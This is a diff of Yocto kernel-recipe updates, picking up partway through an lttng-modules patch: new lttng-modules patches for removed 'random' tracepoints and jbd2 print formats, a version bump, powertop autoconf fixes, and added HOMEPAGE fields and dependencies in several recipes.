6The following kernel commit has been back ported to v5.10.119 and v5.15.44.
7
8commit 14c174633f349cb41ea90c2c0aaddac157012f74
9Author: Jason A. Donenfeld <Jason@zx2c4.com>
10Date: Thu Feb 10 16:40:44 2022 +0100
11
12 random: remove unused tracepoints
13
14 These explicit tracepoints aren't really used and show sign of aging.
15 It's work to keep these up to date, and before I attempted to keep them
16 up to date, they weren't up to date, which indicates that they're not
17 really used. These days there are better ways of introspecting anyway.
18
19Upstream-Status: Backport [1901e0eb58795e850e8fdcb5e1c235e4397b470d]
20Signed-off-by: He Zhe <zhe.he@windriver.com>
21Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
22Change-Id: I0b7eb8aa78b5bd2039e20ae3e1da4c5eb9018789
23---
24 probes/Kbuild | 5 ++++-
25 1 file changed, 4 insertions(+), 1 deletion(-)
26
27diff --git a/probes/Kbuild b/probes/Kbuild
28index 58da82b8..87f2d681 100644
29--- a/probes/Kbuild
30+++ b/probes/Kbuild
31@@ -217,7 +217,10 @@ endif
32
33 # Introduced in v3.6, remove in v5.18
34 obj-$(CONFIG_LTTNG) += $(shell \
35- if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
36+ if [ \( ! \( $(VERSION) -ge 6 \
37+ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
38+ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
39+ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
40 -a \
41 $(VERSION) -ge 4 \
42 -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
43--
442.35.1
45
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
new file mode 100644
index 0000000000..73ba4d06bc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
@@ -0,0 +1,51 @@
1From 2c98e0cd03eba0aa935796bc7413c51b5e4b055c Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Tue, 31 May 2022 15:24:48 -0400
4Subject: [PATCH 19/19] fix: 'random' tracepoints removed in stable kernels
5
6The upstream commit 14c174633f349cb41ea90c2c0aaddac157012f74 removing
7the 'random' tracepoints is being backported to multiple stable kernel
8branches, I don't see how that qualifies as a fix but here we are.
9
10Use the presence of 'include/trace/events/random.h' in the kernel source
11tree instead of the rather tortuous version check to determine if we
12need to build 'lttng-probe-random.ko'.
13
14Upstream-Status: Backport [ed1149ef88fb62c365ac66cf62c58ac6abd8d7e8]
15Change-Id: I8f5f2f4c9e09c61127c49c7949b22dd3fab0460d
16Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
17Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
18---
19 probes/Kbuild | 16 ++++------------
20 1 file changed, 4 insertions(+), 12 deletions(-)
21
22diff --git a/probes/Kbuild b/probes/Kbuild
23index 87f2d681..f09d6b65 100644
24--- a/probes/Kbuild
25+++ b/probes/Kbuild
26@@ -216,18 +216,10 @@ ifneq ($(CONFIG_FRAME_WARN),0)
27 endif
28
29 # Introduced in v3.6, remove in v5.18
30-obj-$(CONFIG_LTTNG) += $(shell \
31- if [ \( ! \( $(VERSION) -ge 6 \
32- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
33- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
34- -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
35- -a \
36- $(VERSION) -ge 4 \
37- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
38- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
39- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
40- -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 0 -a $(SUBLEVEL) -ge 41 \) ] ; then \
41- echo "lttng-probe-random.o" ; fi;)
42+random_dep = $(srctree)/include/trace/events/random.h
43+ifneq ($(wildcard $(random_dep)),)
44+ obj-$(CONFIG_LTTNG) += lttng-probe-random.o
45+endif
46
47 obj-$(CONFIG_LTTNG) += $(shell \
48 if [ $(VERSION) -ge 4 \
49--
502.35.1
51
diff --git a/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
new file mode 100644
index 0000000000..b4939188cc
--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch
@@ -0,0 +1,147 @@
1fix: jbd2: use the correct print format
2See upstream commit :
3
4 commit d87a7b4c77a997d5388566dd511ca8e6b8e8a0a8
5 Author: Bixuan Cui <cuibixuan@linux.alibaba.com>
6 Date: Tue Oct 11 19:33:44 2022 +0800
7
8 jbd2: use the correct print format
9
10 The print format error was found when using ftrace event:
11 <...>-1406 [000] .... 23599442.895823: jbd2_end_commit: dev 252,8 transaction -1866216965 sync 0 head -1866217368
12 <...>-1406 [000] .... 23599442.896299: jbd2_start_commit: dev 252,8 transaction -1866216964 sync 0
13
14 Use the correct print format for transaction, head and tid.
15
16Change-Id: Ic053f0e0c1e24ebc75bae51d07696aaa5e1c0094
17Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
18Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
19
20Upstream-status: Backport
21Signed-off-by: Steve Sakoman <steve@sakoman.com>
22Note: combines three upstream commits:
23https://github.com/lttng/lttng-modules/commit/b28830a0dcdf95ec3e6b390b4d032667deaad0c0
24https://github.com/lttng/lttng-modules/commit/4fd2615b87b3cac0fd5bdc5fc82db05f6fcfdecf
25https://github.com/lttng/lttng-modules/commit/612c99eb24bf72f4d47d02025e92de8c35ece14e
26
27diff --git a/instrumentation/events/lttng-module/jbd2.h b/instrumentation/events/lttng-module/jbd2.h
28--- a/instrumentation/events/lttng-module/jbd2.h
29+++ b/instrumentation/events/lttng-module/jbd2.h
30@@ -29,6 +29,25 @@ LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint,
31 )
32 )
33
34+#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
35+ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
36+ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
37+ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
38+ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
39+ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
40+LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
41+
42+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
43+
44+ TP_ARGS(journal, commit_transaction),
45+
46+ TP_FIELDS(
47+ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
48+ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
49+ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
50+ )
51+)
52+#else
53 LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit,
54
55 TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
56@@ -41,6 +60,7 @@ LTTNG_TRACEPOINT_EVENT_CLASS(jbd2_commit
57 ctf_integer(int, transaction, commit_transaction->t_tid)
58 )
59 )
60+#endif
61
62 LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_commit, jbd2_start_commit,
63
64@@ -79,6 +99,25 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(jbd2_com
65 )
66 #endif
67
68+#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
69+ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
70+ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
71+ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
72+ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
73+ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
74+LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
75+ TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
76+
77+ TP_ARGS(journal, commit_transaction),
78+
79+ TP_FIELDS(
80+ ctf_integer(dev_t, dev, journal->j_fs_dev->bd_dev)
81+ ctf_integer(char, sync_commit, commit_transaction->t_synchronous_commit)
82+ ctf_integer(tid_t, transaction, commit_transaction->t_tid)
83+ ctf_integer(tid_t, head, journal->j_tail_sequence)
84+ )
85+)
86+#else
87 LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
88 TP_PROTO(journal_t *journal, transaction_t *commit_transaction),
89
90@@ -91,6 +130,7 @@ LTTNG_TRACEPOINT_EVENT(jbd2_end_commit,
91 ctf_integer(int, head, journal->j_tail_sequence)
92 )
93 )
94+#endif
95
96 LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode_data,
97 TP_PROTO(struct inode *inode),
98@@ -103,7 +143,48 @@ LTTNG_TRACEPOINT_EVENT(jbd2_submit_inode
99 )
100 )
101
102-#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(2,6,32))
103+#if (LTTNG_LINUX_VERSION_CODE >= LTTNG_KERNEL_VERSION(6,2,0) \
104+ || LTTNG_KERNEL_RANGE(5,4,229, 5,5,0) \
105+ || LTTNG_KERNEL_RANGE(5,10,163, 5,11,0) \
106+ || LTTNG_KERNEL_RANGE(5,15,87, 5,16,0) \
107+ || LTTNG_KERNEL_RANGE(6,0,18, 6,1,0) \
108+ || LTTNG_KERNEL_RANGE(6,1,4, 6,2,0))
109+LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
110+ TP_PROTO(dev_t dev, tid_t tid,
111+ struct transaction_run_stats_s *stats),
112+
113+ TP_ARGS(dev, tid, stats),
114+
115+ TP_FIELDS(
116+ ctf_integer(dev_t, dev, dev)
117+ ctf_integer(tid_t, tid, tid)
118+ ctf_integer(unsigned long, wait, stats->rs_wait)
119+ ctf_integer(unsigned long, running, stats->rs_running)
120+ ctf_integer(unsigned long, locked, stats->rs_locked)
121+ ctf_integer(unsigned long, flushing, stats->rs_flushing)
122+ ctf_integer(unsigned long, logging, stats->rs_logging)
123+ ctf_integer(__u32, handle_count, stats->rs_handle_count)
124+ ctf_integer(__u32, blocks, stats->rs_blocks)
125+ ctf_integer(__u32, blocks_logged, stats->rs_blocks_logged)
126+ )
127+)
128+
129+LTTNG_TRACEPOINT_EVENT(jbd2_checkpoint_stats,
130+ TP_PROTO(dev_t dev, tid_t tid,
131+ struct transaction_chp_stats_s *stats),
132+
133+ TP_ARGS(dev, tid, stats),
134+
135+ TP_FIELDS(
136+ ctf_integer(dev_t, dev, dev)
137+ ctf_integer(tid_t, tid, tid)
138+ ctf_integer(unsigned long, chp_time, stats->cs_chp_time)
139+ ctf_integer(__u32, forced_to_close, stats->cs_forced_to_close)
140+ ctf_integer(__u32, written, stats->cs_written)
141+ ctf_integer(__u32, dropped, stats->cs_dropped)
142+ )
143+)
144+#else
145 LTTNG_TRACEPOINT_EVENT(jbd2_run_stats,
146 TP_PROTO(dev_t dev, unsigned long tid,
147 struct transaction_run_stats_s *stats),
diff --git a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
index 26c247e169..8e9c44241b 100644
--- a/meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb
+++ b/meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb
@@ -1,6 +1,7 @@
1SECTION = "devel" 1SECTION = "devel"
2SUMMARY = "Linux Trace Toolkit KERNEL MODULE" 2SUMMARY = "Linux Trace Toolkit KERNEL MODULE"
3DESCRIPTION = "The lttng-modules 2.0 package contains the kernel tracer modules" 3DESCRIPTION = "The lttng-modules 2.0 package contains the kernel tracer modules"
4HOMEPAGE = "https://lttng.org/"
4LICENSE = "LGPLv2.1 & GPLv2 & MIT" 5LICENSE = "LGPLv2.1 & GPLv2 & MIT"
5LIC_FILES_CHKSUM = "file://LICENSE;md5=3f882d431dc0f32f1f44c0707aa41128" 6LIC_FILES_CHKSUM = "file://LICENSE;md5=3f882d431dc0f32f1f44c0707aa41128"
6 7
@@ -11,26 +12,14 @@ COMPATIBLE_HOST = '(x86_64|i.86|powerpc|aarch64|mips|nios2|arm|riscv).*-linux'
11SRC_URI = "https://lttng.org/files/${BPN}/${BPN}-${PV}.tar.bz2 \ 12SRC_URI = "https://lttng.org/files/${BPN}/${BPN}-${PV}.tar.bz2 \
12 file://Makefile-Do-not-fail-if-CONFIG_TRACEPOINTS-is-not-en.patch \ 13 file://Makefile-Do-not-fail-if-CONFIG_TRACEPOINTS-is-not-en.patch \
13 file://BUILD_RUNTIME_BUG_ON-vs-gcc7.patch \ 14 file://BUILD_RUNTIME_BUG_ON-vs-gcc7.patch \
14 file://0001-fix-strncpy-equals-destination-size-warning.patch \ 15 file://0017-fix-random-remove-unused-tracepoints-v5.18.patch \
15 file://0002-fix-objtool-Rename-frame.h-objtool.h-v5.10.patch \ 16 file://0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch \
16 file://0003-fix-btrfs-tracepoints-output-proper-root-owner-for-t.patch \ 17 file://0019-fix-random-tracepoints-removed-in-stable-kernels.patch \
17 file://0004-fix-btrfs-make-ordered-extent-tracepoint-take-btrfs_.patch \ 18 file://fix-jbd2-use-the-correct-print-format.patch \
18 file://0005-fix-ext4-fast-commit-recovery-path-v5.10.patch \
19 file://0006-fix-KVM-x86-Add-intr-vectoring-info-and-error-code-t.patch \
20 file://0007-fix-kvm-x86-mmu-Add-TDP-MMU-PF-handler-v5.10.patch \
21 file://0008-fix-KVM-x86-mmu-Return-unique-RET_PF_-values-if-the-.patch \
22 file://0009-fix-tracepoint-Optimize-using-static_call-v5.10.patch \
23 file://0010-fix-include-order-for-older-kernels.patch \
24 file://0011-Add-release-maintainer-script.patch \
25 file://0012-Improve-the-release-script.patch \
26 file://0013-fix-backport-of-fix-ext4-fast-commit-recovery-path-v.patch \
27 file://0014-Revert-fix-include-order-for-older-kernels.patch \
28 file://0015-fix-backport-of-fix-tracepoint-Optimize-using-static.patch \
29 file://0016-fix-adjust-version-range-for-trace_find_free_extent.patch \
30 " 19 "
31 20
32SRC_URI[md5sum] = "8ef09fdfcdec669d33f7fc1c1c80f2c4" 21SRC_URI[md5sum] = "cfb23ea6bdaf1ad40c7f9ac098b4016d"
33SRC_URI[sha256sum] = "23372811cdcd2ac28ba8c9d09484ed5f9238cfbd0043f8c663ff3875ba9c8566" 22SRC_URI[sha256sum] = "0c5fe9f8d8dbd1411a3c1c643dcbd0a55577bd15845758b73948e00bc7c387a6"
34 23
35export INSTALL_MOD_DIR="kernel/lttng-modules" 24export INSTALL_MOD_DIR="kernel/lttng-modules"
36 25
@@ -38,7 +27,9 @@ EXTRA_OEMAKE += "KERNELDIR='${STAGING_KERNEL_DIR}'"
38 27
39do_install_append() { 28do_install_append() {
40 # Delete empty directories to avoid QA failures if no modules were built 29 # Delete empty directories to avoid QA failures if no modules were built
41 find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \; 30 if [ -d ${D}/${nonarch_base_libdir} ]; then
31 find ${D}/${nonarch_base_libdir} -depth -type d -empty -exec rmdir {} \;
32 fi
42} 33}
43 34
44python do_package_prepend() { 35python do_package_prepend() {
diff --git a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
index a969fffd62..6306193809 100644
--- a/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
+++ b/meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb
@@ -3,13 +3,14 @@ SUMMARY = "Linux Trace Toolkit Control"
3DESCRIPTION = "The Linux trace toolkit is a suite of tools designed \ 3DESCRIPTION = "The Linux trace toolkit is a suite of tools designed \
4to extract program execution details from the Linux operating system \ 4to extract program execution details from the Linux operating system \
5and interpret them." 5and interpret them."
6HOMEPAGE = "https://github.com/lttng/lttng-tools"
6 7
7LICENSE = "GPLv2 & LGPLv2.1" 8LICENSE = "GPLv2 & LGPLv2.1"
8LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \ 9LIC_FILES_CHKSUM = "file://LICENSE;md5=01d7fc4496aacf37d90df90b90b0cac1 \
9 file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ 10 file://gpl-2.0.txt;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
10 file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca" 11 file://lgpl-2.1.txt;md5=0f0d71500e6a57fd24d825f33242b9ca"
11 12
12DEPENDS = "liburcu popt libxml2 util-linux" 13DEPENDS = "liburcu popt libxml2 util-linux bison-native"
13RDEPENDS_${PN} = "libgcc" 14RDEPENDS_${PN} = "libgcc"
14RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core" 15RDEPENDS_${PN}-ptest += "make perl bash gawk babeltrace procps perl-module-overloading coreutils util-linux kmod lttng-modules sed python3-core"
15RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils" 16RDEPENDS_${PN}-ptest_append_libc-glibc = " glibc-utils"
diff --git a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
index c7edb20ee4..32b89bb5ea 100644
--- a/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
+++ b/meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb
@@ -1,8 +1,9 @@
1SUMMARY = "Build tools needed by external modules" 1SUMMARY = "Build tools needed by external modules"
2HOMEPAGE = "https://www.yoctoproject.org/"
2LICENSE = "GPLv2" 3LICENSE = "GPLv2"
3LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/GPL-2.0;md5=801f80980d171dd6425610833a22dbe6" 4LIC_FILES_CHKSUM = "file://${COREBASE}/meta/files/common-licenses/GPL-2.0;md5=801f80980d171dd6425610833a22dbe6"
4 5
5inherit kernel-arch 6inherit kernel-arch linux-kernel-base
6inherit pkgconfig 7inherit pkgconfig
7 8
8PACKAGE_ARCH = "${MACHINE_ARCH}" 9PACKAGE_ARCH = "${MACHINE_ARCH}"
@@ -15,8 +16,10 @@ do_compile[depends] += "virtual/kernel:do_compile_kernelmodules"
15RDEPENDS_${PN}-dev = "" 16RDEPENDS_${PN}-dev = ""
16 17
17DEPENDS += "bc-native bison-native" 18DEPENDS += "bc-native bison-native"
19DEPENDS += "gmp-native"
18 20
19EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}"" 21EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
22EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}" CROSS_COMPILE=${TARGET_PREFIX}"
20 23
21# Build some host tools under work-shared. CC, LD, and AR are probably 24# Build some host tools under work-shared. CC, LD, and AR are probably
22# not used, but this is the historical way of invoking "make scripts". 25# not used, but this is the historical way of invoking "make scripts".
diff --git a/meta/recipes-kernel/perf/perf.bb b/meta/recipes-kernel/perf/perf.bb
index 578b871e9e..42621e47d3 100644
--- a/meta/recipes-kernel/perf/perf.bb
+++ b/meta/recipes-kernel/perf/perf.bb
@@ -9,11 +9,11 @@ HOMEPAGE = "https://perf.wiki.kernel.org/index.php/Main_Page"
9 9
10LICENSE = "GPLv2" 10LICENSE = "GPLv2"
11 11
12PR = "r9" 12PR = "r10"
13 13
14PACKAGECONFIG ??= "scripting tui libunwind" 14PACKAGECONFIG ??= "scripting tui libunwind"
15PACKAGECONFIG[dwarf] = ",NO_DWARF=1" 15PACKAGECONFIG[dwarf] = ",NO_DWARF=1"
16PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3" 16PACKAGECONFIG[scripting] = ",NO_LIBPERL=1 NO_LIBPYTHON=1,perl python3 python3-setuptools-native"
17# gui support was added with kernel 3.6.35 17# gui support was added with kernel 3.6.35
18# since 3.10 libnewt was replaced by slang 18# since 3.10 libnewt was replaced by slang
19# to cover a wide range of kernel we add both dependencies 19# to cover a wide range of kernel we add both dependencies
@@ -45,7 +45,7 @@ PROVIDES = "virtual/perf"
45inherit linux-kernel-base kernel-arch manpages 45inherit linux-kernel-base kernel-arch manpages
46 46
47# needed for building the tools/perf Python bindings 47# needed for building the tools/perf Python bindings
48inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3native', '', d)} 48inherit ${@bb.utils.contains('PACKAGECONFIG', 'scripting', 'python3targetconfig', '', d)}
49inherit python3-dir 49inherit python3-dir
50export PYTHON_SITEPACKAGES_DIR 50export PYTHON_SITEPACKAGES_DIR
51 51
@@ -265,9 +265,9 @@ PACKAGES =+ "${PN}-archive ${PN}-tests ${PN}-perl ${PN}-python"
265 265
266RDEPENDS_${PN} += "elfutils bash" 266RDEPENDS_${PN} += "elfutils bash"
267RDEPENDS_${PN}-archive =+ "bash" 267RDEPENDS_${PN}-archive =+ "bash"
268RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python3', '', d)}" 268RDEPENDS_${PN}-python =+ "bash python3 python3-modules ${@bb.utils.contains('PACKAGECONFIG', 'audit', 'audit-python', '', d)}"
269RDEPENDS_${PN}-perl =+ "bash perl perl-modules" 269RDEPENDS_${PN}-perl =+ "bash perl perl-modules"
270RDEPENDS_${PN}-tests =+ "python3" 270RDEPENDS_${PN}-tests =+ "python3 bash"
271 271
272RSUGGESTS_SCRIPTING = "${@bb.utils.contains('PACKAGECONFIG', 'scripting', '${PN}-perl ${PN}-python', '',d)}" 272RSUGGESTS_SCRIPTING = "${@bb.utils.contains('PACKAGECONFIG', 'scripting', '${PN}-perl ${PN}-python', '',d)}"
273RSUGGESTS_${PN} += "${PN}-archive ${PN}-tests ${RSUGGESTS_SCRIPTING}" 273RSUGGESTS_${PN} += "${PN}-archive ${PN}-tests ${RSUGGESTS_SCRIPTING}"
diff --git a/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
new file mode 100644
index 0000000000..4ccbdbfcd1
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch
@@ -0,0 +1,70 @@
1From 0d833743954ac1c58773cbf7a78fe0dc8105ae4a Mon Sep 17 00:00:00 2001
2From: Joe Konno <joe.konno@linux.intel.com>
3Date: Tue, 11 Feb 2020 14:15:42 -0800
4Subject: [PATCH] configure.ac: ax_add_fortify_source
5
6Use a maintained autoconf-archive macro to determine whether we need to
7add -D_FORTIFY_SOURCE=3D2, or if the underlying OS (or toolchain) has it
8baked in.
9
10Signed-off-by: Joe Konno <joe.konno@intel.com>
11
12Fixes:
13 aclocal: error: too many loops
14
15Upstream-Status: Backport from 2.12
16Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
17---
18 configure.ac | 2 +-
19 m4/gcc_fortify_source_cc.m4 | 29 -----------------------------
20 2 files changed, 1 insertion(+), 30 deletions(-)
21 delete mode 100644 m4/gcc_fortify_source_cc.m4
22
23diff --git a/configure.ac b/configure.ac
24index d6a15e1..d68369c 100644
25--- a/configure.ac
26+++ b/configure.ac
27@@ -36,7 +36,7 @@ AC_PROG_LIBTOOL
28 AC_PROG_CC
29 AC_PROG_INSTALL
30 AM_PROG_CC_C_O
31-GCC_FORTIFY_SOURCE_CC
32+AX_ADD_FORTIFY_SOURCE
33 AX_CXX_COMPILE_STDCXX_11([noext], [mandatory])
34
35 # Checks for libraries.
36diff --git a/m4/gcc_fortify_source_cc.m4 b/m4/gcc_fortify_source_cc.m4
37deleted file mode 100644
38index 1206672..0000000
39--- a/m4/gcc_fortify_source_cc.m4
40+++ /dev/null
41@@ -1,29 +0,0 @@
42-dnl GCC_FORTIFY_SOURCE_CC
43-dnl checks -D_FORTIFY_SOURCE with the C++ compiler, if it exists then
44-dnl updates CXXCPP
45-AC_DEFUN([GCC_FORTIFY_SOURCE_CC],[
46- AC_LANG_ASSERT([C++])
47- AS_IF([test "X$CXX" != "X"], [
48- AC_MSG_CHECKING([for FORTIFY_SOURCE support])
49- fs_old_cxxcpp="$CXXCPP"
50- fs_old_cxxflags="$CXXFLAGS"
51- CXXCPP="$CXXCPP -D_FORTIFY_SOURCE=2"
52- CXXFLAGS="$CXXFLAGS -Werror"
53- AC_COMPILE_IFELSE([
54- AC_LANG_PROGRAM([[]], [[
55- int main(void) {
56- #if !(__GNUC_PREREQ (4, 1) )
57- #error No FORTIFY_SOURCE support
58- #endif
59- return 0;
60- }
61- ]], [
62- AC_MSG_RESULT([yes])
63- ], [
64- AC_MSG_RESULT([no])
65- CXXCPP="$fs_old_cxxcpp"
66- ])
67- ])
68- CXXFLAGS="$fs_old_cxxflags"
69- ])
70-])
diff --git a/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
new file mode 100644
index 0000000000..ac728f4a39
--- /dev/null
+++ b/meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch
@@ -0,0 +1,29 @@
1From fbf74492236676e844b021b0dbb45b1ca43a0410 Mon Sep 17 00:00:00 2001
2From: David King <amigadave@amigadave.com>
3Date: Thu, 15 Apr 2021 11:45:13 +0100
4Subject: [PATCH] configure: Use AX_REQUIRE_DEFINED
5
6Require additional macros to be defined early, to avoid an aclocal
7"too many loops" error when copying macros.
8
9Upstream-Status: Backport from tip
10
11Signed-off-by: Tim Orling <ticotimo@gmail.com>
12---
13 configure.ac | 3 +++
14 1 file changed, 3 insertions(+)
15
16diff --git a/configure.ac b/configure.ac
17index d68369c..b90831b 100644
18--- a/configure.ac
19+++ b/configure.ac
20@@ -29,6 +29,9 @@ AM_GNU_GETTEXT([external])
21 AM_GNU_GETTEXT_VERSION([0.18.2])
22
23 m4_ifdef([AM_PROG_AR], [AM_PROG_AR])
24+AX_REQUIRE_DEFINED([AX_ADD_FORTIFY_SOURCE])
25+AX_REQUIRE_DEFINED([AX_CXX_COMPILE_STDCXX])
26+AX_REQUIRE_DEFINED([AX_PTHREAD])
27 # Checks for programs.
28 AC_PROG_CPP
29 AC_PROG_CXX
diff --git a/meta/recipes-kernel/powertop/powertop_2.10.bb b/meta/recipes-kernel/powertop/powertop_2.10.bb
index f1b0e92b2b..dcbba2fd5c 100644
--- a/meta/recipes-kernel/powertop/powertop_2.10.bb
+++ b/meta/recipes-kernel/powertop/powertop_2.10.bb
@@ -2,13 +2,15 @@ SUMMARY = "Power usage tool"
2DESCRIPTION = "Linux tool to diagnose issues with power consumption and power management." 2DESCRIPTION = "Linux tool to diagnose issues with power consumption and power management."
3HOMEPAGE = "https://01.org/powertop/" 3HOMEPAGE = "https://01.org/powertop/"
4BUGTRACKER = "https://app.devzing.com/powertopbugs/bugzilla" 4BUGTRACKER = "https://app.devzing.com/powertopbugs/bugzilla"
5DEPENDS = "ncurses libnl pciutils" 5DEPENDS = "ncurses libnl pciutils autoconf-archive"
6LICENSE = "GPLv2" 6LICENSE = "GPLv2"
7LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e" 7LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
8 8
9SRC_URI = "git://github.com/fenrus75/powertop;protocol=https \ 9SRC_URI = "git://github.com/fenrus75/powertop;protocol=https;branch=master \
10 file://0001-wakeup_xxx.h-include-limits.h.patch \ 10 file://0001-wakeup_xxx.h-include-limits.h.patch \
11" 11 file://0002-configure.ac-ax_add_fortify_source.patch \
12 file://0003-configure-Use-AX_REQUIRE_DEFINED.patch \
13 "
12SRCREV = "e8765b5475b22b7a2b6e9e8a031c68a268a0b0b3" 14SRCREV = "e8765b5475b22b7a2b6e9e8a031c68a268a0b0b3"
13 15
14S = "${WORKDIR}/git" 16S = "${WORKDIR}/git"
diff --git a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
index 46820ef489..6ee0be5e3e 100644
--- a/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb
@@ -1,5 +1,5 @@
1SUMMARY = "UProbes kernel module for SystemTap" 1SUMMARY = "UProbes kernel module for SystemTap"
2 2HOMEPAGE = "https://sourceware.org/systemtap/"
3require systemtap_git.inc 3require systemtap_git.inc
4 4
